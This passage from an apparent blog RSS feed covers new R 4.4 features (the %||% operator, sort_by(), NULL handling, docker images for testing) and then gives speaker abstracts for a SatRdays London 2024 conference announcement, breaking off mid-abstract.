&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A common use for &lt;code&gt;NULL&lt;/code&gt; is as a default argument in a function
signature. A &lt;code&gt;NULL&lt;/code&gt; default is often used for parameters that aren’t
critical to function evaluation. For example, the function signature for
&lt;code&gt;matrix()&lt;/code&gt; is as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, ncol &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, byrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, dimnames &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;dimnames&lt;/code&gt; parameter isn’t really needed to create a &lt;code&gt;matrix&lt;/code&gt;, but
when a non-&lt;code&gt;NULL&lt;/code&gt; value for &lt;code&gt;dimnames&lt;/code&gt; is provided, the values are used
to label the row and column names of the created &lt;code&gt;matrix&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [,1] [,2]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1,] 1 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [2,] 2 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, dimnames &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;2024&amp;#34;&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jan&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Feb&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Jan Feb&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2023 1 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2024 2 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R 4.4 introduces the &lt;code&gt;%||%&lt;/code&gt; operator to help when handling variables
that are potentially &lt;code&gt;NULL&lt;/code&gt;. When working with variables that could be
&lt;code&gt;NULL&lt;/code&gt;, you might have written code like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Remember there is no &amp;#39;url&amp;#39; field in our `config` list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Set a default value for the &amp;#39;url&amp;#39; if one isn&amp;#39;t defined in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# the config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;} &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Assuming &lt;code&gt;config&lt;/code&gt; is a &lt;code&gt;list&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;when the &lt;code&gt;url&lt;/code&gt; entry is absent from &lt;code&gt;config&lt;/code&gt; (or is itself &lt;code&gt;NULL&lt;/code&gt;),
then &lt;code&gt;config$url&lt;/code&gt; will be &lt;code&gt;NULL&lt;/code&gt; and the variable &lt;code&gt;my_url&lt;/code&gt; will be set
to the default value;&lt;/li&gt;
&lt;li&gt;but when the &lt;code&gt;url&lt;/code&gt; entry is found within &lt;code&gt;config&lt;/code&gt; (and isn’t &lt;code&gt;NULL&lt;/code&gt;)
then that value will be stored in &lt;code&gt;my_url&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That code can now be rewritten as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.jumpingrivers.com/blog&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;https://www.jumpingrivers.com/blog&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the left-hand value must evaluate to &lt;code&gt;NULL&lt;/code&gt; for the right-hand
side to be evaluated, and that empty vectors aren’t &lt;code&gt;NULL&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;numeric&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%||%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; numeric(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This operator has been available in the &lt;code&gt;{rlang}&lt;/code&gt; package for eight
years and is implemented in exactly the same way. So if you have been
using &lt;code&gt;%||%&lt;/code&gt; in your code already, the base-R version of this operator
should work without any problems, though you may want to wait until you
are certain all your users are using R &amp;gt;= 4.4 before switching from
{rlang} to the base-R version of &lt;code&gt;%||%&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="any-other-business"&gt;Any other business&lt;/h3&gt;
&lt;p&gt;A &lt;a href="https://en.wikipedia.org/wiki/Web_colors#Shorthand_hexadecimal_form" rel="external"&gt;shorthand hexadecimal
format&lt;/a&gt;
(common in web-programming) for specifying RGB colours has been
introduced. So, rather than writing the 6-digit hexcode for a colour
“#112233”, you can use “#123”. This only works for those 6-digit
hexcodes where the digits are repeated in pairs.&lt;/p&gt;
&lt;p&gt;Parsing and formatting of complex numbers has been improved. For
example, &lt;code&gt;as.complex(&amp;quot;1i&amp;quot;)&lt;/code&gt; now returns the complex number &lt;code&gt;0 + 1i&lt;/code&gt;,
previously it returned &lt;code&gt;NA&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;There are a few other changes related to handling &lt;code&gt;NULL&lt;/code&gt; that have been
introduced in R 4.4. The changes highlight that &lt;code&gt;NULL&lt;/code&gt; is quite
different from an empty vector. Empty vectors contain nothing, whereas
&lt;code&gt;NULL&lt;/code&gt; represents nothing. For example, whereas an empty numeric vector
is considered to be an atomic (unnestable) data structure, &lt;code&gt;NULL&lt;/code&gt; is no
longer atomic. Also, &lt;code&gt;NCOL(NULL)&lt;/code&gt; (the number of columns in a matrix
formed from &lt;code&gt;NULL&lt;/code&gt;) is now 0, whereas it was formerly 1.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sort_by()&lt;/code&gt; a new function for sorting objects based on values in a
separate object. This can be used to sort a &lt;code&gt;data.frame&lt;/code&gt; based on it’s
columns (they should be specified as a formula):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mtcars &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sort_by&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(cyl, mpg)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## mpg cyl disp hp drat wt qsec vs am gear carb&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Volvo 142E 21.4 4 121.0 109 4.11 2.780 18.60 1 1 4 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Toyota Corona 21.5 4 120.1 97 3.70 2.465 20.01 1 0 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Datsun 710 22.8 4 108.0 93 3.85 2.320 18.61 1 1 4 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Merc 230 22.8 4 140.8 95 3.92 3.150 22.90 1 0 4 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Merc 240D 24.4 4 146.7 62 3.69 3.190 20.00 1 0 4 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Porsche 914-2 26.0 4 120.3 91 4.43 2.140 16.70 0 1 5 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="try-the-latest-version-out-for-yourself"&gt;Try the latest version out for yourself&lt;/h3&gt;
&lt;p&gt;To take away the pain of installing the latest development version of R,
you can use docker. To use the &lt;code&gt;devel&lt;/code&gt; version of R, you can use the
following commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:devel-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once R 4.4 is the released version of R and the &lt;code&gt;r-docker&lt;/code&gt; repository
has been updated, you should use the following command to test out R
4.4.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:4.4-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:4.4-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;p&gt;The R 4.x versions have introduced a wealth of interesting changes.
These have been summarised in our earlier blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R
4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;R 4.2.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/whats-new-r43/" rel="external"&gt;R 4.3.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r44/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Registration Closing Soon</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/</link><pubDate>Fri, 12 Apr 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-registration-closing/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;h3 id="satrdays-registration-will-be-closing-soon"&gt;SatRdays registration will be closing soon!&lt;/h3&gt;
&lt;p&gt;Here&amp;rsquo;s a reminder of what we have lined up for you.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll be welcoming 9 fantastic speakers from across a variety of industries to give you an insight into how you can use R for many different applications, including use case examples such as modelling humanitarian crises and risks to road users, as well as systems involving high performance computing, and general overviews of new additions to the tidyverse, quarto and much more!&lt;/p&gt;
&lt;p&gt;Check out the abstracts below. Don&amp;rsquo;t miss out on this excellent opportunity, sign up now &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;on the website&lt;/a&gt; and get 20% off the ticket price!&lt;/p&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;div class="central-content"&gt;
&lt;a href="https://satrdays-london-2024.jumpingrivers.com/" class="buttony-link dark"&gt;Register Now &lt;i class="fa fa-angle-double-right"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;h3 id="andrie-de-vries---posit"&gt;&lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andrie de Vries&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/andrie@2x.jpg" alt="Photo of Andrie de Vries" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="lessons-learnt-from-product-management-applied-to-data-science"&gt;Lessons learnt from Product Management, applied to Data Science&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;As a Data Scientist you build data products all the time. You may even have worked with a Product Manager to create analyses and dashboards for decision making.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;But are you applying the skills of product management in your data science role?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this talk Andrie provides an overview of Product Management (PM), and what he’s learnt over two decades of managing products, ranging from hardware (Psion PDAs) to software (Microsoft R Open, Posit Workbench) and hosted services (MRAN).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Every product manager must consider the new product adoption life cycle, managing the stages from finding the first innovators, managing growth and ultimately the end-of-life process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;During this process you must manage your product so that it’s usable (customers want it), feasible (you can build it) and valuable (you can do this sustainably). Many frameworks exist to think about discovering what customers want, the jobs they must get done, forming a value proposition, managing a product roadmap, working with dev teams to build it, and working with marketing and sales to create a compelling sales pitch.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;As a data scientist, you can benefit from product management knowledge by thinking of your app as a product. You must convince your users (internal customers) to use this app (at the cost of changing their workflow).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;I will leave you with a map to get started with classic resources, including Geoffrey Moore, Marty Cagan, Teresa Torres, April Dunford and Lenny’s Podcast.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="hannah-frick---posit"&gt;&lt;a href="https://www.linkedin.com/in/hannah-frick" rel="external"&gt;Hannah Frick&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; &lt;img src="images/hannah@2x.jpg" alt="Photo of Hannah Frick" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="survival-analysis-is-coming-to-tidymodels"&gt;Survival analysis is coming to tidymodels&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;If you have time-to-event data, such as data on customer churn, data on the lifetime of machines, or similar, survival analysis with its censored regression models gives you the ability to include all your observations in the model appropriately, including those where you may not have observed the event yet.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The tidymodels framework is a collection of packages for safe, performant, and expressive supervised predictive modeling on tabular data. The framework&amp;rsquo;s consistency makes switching between models easy, its guardrails against common pitfalls such as overfitting due to data leakage make it safe. It covers the entire modeling workflow: preprocessing and feature engineering, models, resamples, performance metrics, and tuning.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;We are now extending support for survival analysis across the entire tidymodels framework with dedicated models and metrics, allowing the same ease and expressiveness as for classification and regression, across all steps of the modeling process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="charlie-gao---hibiki-ai-limited"&gt;&lt;a href="https://shikokuchuo.net/" rel="external"&gt;Charlie Gao&lt;/a&gt; - &lt;a href="https://hibiki-ai.com/" rel="external"&gt;Hibiki AI Limited&lt;/a&gt; &lt;img src="images/charlie@2x.jpg" alt="Photo of Charlie Gao" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="mirai-for-shiny-and-plumber-applications"&gt;mirai’ for Shiny and Plumber Applications&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;‘mirai’ is Japanese for ‘future’. Some of the existing solutions for parallelization in R have not fundamentally changed in 20 years. The technologies behind ‘mirai’ are, in contrast, modern and minimalist, and provide a level of performance that will be noticeable for demanding, client-facing workloads typical of Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;As a scheduler for distributed tasks, ‘mirai’ currently powers the high performance computing needs for the ‘targets’ reproducible-workflow ecosystem, whether locally, on traditional HPC clusters or the cloud. It has undergone the validation required to reliably handle demanding scientific workloads such as clinical trials simulations. At R Project Sprint 2023, it was integrated as a backend for the base R ‘parallel’ package at the request of R-Core.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The same industrial-strength, yet incredibly lightweight solution is now available to power large-scale Shiny and Plumber applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;This presentation demonstrates how ‘mirai’ works in typical example situations which benefit from parallelization of computations, and the different ways they may be distributed to background processes on the same machine or across a network of servers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;A particular highlight will be the zero-configuration TLS option. This ‘just works’ to protect remote connections using single-use certificates generated on-the-fly. This was developed under an R Consortium infrastructure grant that aims to make such technologies available to the wider R community.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="michael-hogers---npl-markets-ltd"&gt;&lt;a href="https://www.linkedin.com/in/michaelhogers" rel="external"&gt;Michael Hogers&lt;/a&gt; - &lt;a href="https://nplmarkets.com/" rel="external"&gt;NPL Markets Ltd&lt;/a&gt; &lt;img src="images/michael@2x.jpg" alt="Photo of Michael Hogers" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;&lt;/h3&gt;
&lt;h4 id="modular-shinyproxy---a-saas-setup"&gt;Modular Shiny(Proxy) - a SaaS setup&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;I aim to provide a talk that displays how one can use R, Shiny and ShinyProxy (or other deployment methods) to create a modular SaaS platform that later allows to swap out modules of the platform with new languages or frameworks. The key ingredients are: use a database back-end across Shiny modules, deploy modules as relatively small apps to dedicated URL endpoints, use a shared UI library across Shiny modules and package your Shiny apps (+ use CI/CD) while keeping business logic separated to later on export business logic functions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="matthew-lam--matthew-law---mott-macdonald"&gt;&lt;a href="https://www.linkedin.com/in/matthewgarethlam/" rel="external"&gt;Matthew Lam&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/matthewjlaw/" rel="external"&gt;Matthew Law&lt;/a&gt; - &lt;a href="https://www.mottmac.com/" rel="external"&gt;Mott MacDonald&lt;/a&gt;&lt;/h3&gt;
&lt;div&gt;&lt;img src="images/matthew-lam@2x.jpg" alt="Photo of Matthew Lam" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;img src="images/matthew-law@2x.jpg" alt="Photo of Matthew Law" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt; &lt;/div&gt;
&lt;h4 id="how-mott-macdonald-unlocks-the-power-of-geospatial-data-with-r"&gt;How Mott MacDonald unlocks the power of geospatial data with R&lt;/h4&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;
&lt;blockquote&gt;
&lt;p&gt;Mott MacDonald is a global engineering, management, and development consultancy with a broad portfolio of projects across various engineering disciplines. Geospatial data plays an instrumental role in supporting projects in these sectors, enabling us to understand the world around us so that we can make better informed decisions, improve efficiencies, and drive digital innovation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;In this presentation, we will illustrate how we use R at Mott MacDonald to harness the power of geospatial data with two examples – Risk Modelling for Ash Dieback and Creative Geospatial Visualisation for Impactful Communication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
